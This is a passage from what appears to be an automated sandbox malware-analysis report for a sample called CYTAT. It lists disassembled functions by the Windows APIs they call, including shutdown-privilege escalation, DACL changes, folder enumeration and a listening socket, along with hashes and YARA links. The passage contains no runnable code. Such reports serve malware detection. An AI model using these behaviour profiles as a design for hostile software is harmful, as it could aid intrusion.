                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 999945258-2428617273
                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                • __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscpy.LIBCMT ref: 004034A7
                                                • _wcscat.LIBCMT ref: 004034BC
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                • _wcscpy.LIBCMT ref: 004035A0
                                                • _wcslen.LIBCMT ref: 00403623
                                                • _wcslen.LIBCMT ref: 0040367D
                                                Strings
                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                • Unterminated string, xrefs: 00428348
                                                • Error opening the file, xrefs: 00428231
                                                • _, xrefs: 0040371C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                • API String ID: 3393021363-188983378
                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                • __swprintf.LIBCMT ref: 00431C2E
                                                • _wcslen.LIBCMT ref: 00431C3A
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2192556992-3457252023
                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                • __swprintf.LIBCMT ref: 004722B9
                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FolderPath$LocalTime__swprintf
                                                • String ID: %.3d
                                                • API String ID: 3337348382-986655627
                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                • GetLastError.KERNEL32 ref: 00433414
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2938487562-3733053543
                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 1255039815-0
                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                • __swprintf.LIBCMT ref: 00433073
                                                • __swprintf.LIBCMT ref: 00433085
                                                • __wcsicoll.LIBCMT ref: 00433092
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                • LockResource.KERNEL32(?), ref: 00433120
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                • String ID:
                                                • API String ID: 1158019794-0
                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_strncmp
                                                • String ID: @oH$\$^$h
                                                • API String ID: 2175499884-3701065813
                                                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
